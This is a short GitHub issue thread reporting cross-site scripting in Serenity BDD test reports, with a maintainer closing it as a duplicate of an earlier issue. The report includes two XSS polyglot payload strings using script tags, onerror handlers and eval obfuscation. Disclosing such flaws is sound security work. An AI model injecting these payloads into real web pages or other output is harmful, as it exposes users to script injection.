### ISSUE TITLE
Reports XSS

### ISSUE THREAD

**Issue by beardpony** [serenity-bdd/serenity-core#280]
XSS in test reports.

Vectors:
`';alert(1)//\";alert(1)//-- ></SCRIPT>\">'><SCRIPT>alert(1)</SCRIPT>`

`\">><marquee><img src=x onerror=confirm(1)></marquee>\" ></plaintext\\></|\\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->\" ></script><script>alert(1)</script>\"><img/id=\"confirm&lpar; 1)\"/alt=\"/\"src=\"/\"onerror=eval(id&%23x29;>'\"><img src=\"http: //i.imgur.com/P8mL8.jpg\">`

https://s.mail.ru/46bC9WjWqohW/img-2016-02-03-11-01-31.png

**Comment by YamStranger** [comment]
![image](https://cloud.githubusercontent.com/assets/1667699/12783472/aa829d20-ca36-11e5-9d43-9ba188d93c07.png)

**Comment by YamStranger** [comment]
Hello @beardpony, Thanks for this issue!. 

It is duplicate to #246. 

Please close this issue, all fixes will be provided under #246 

Thanks a lot!
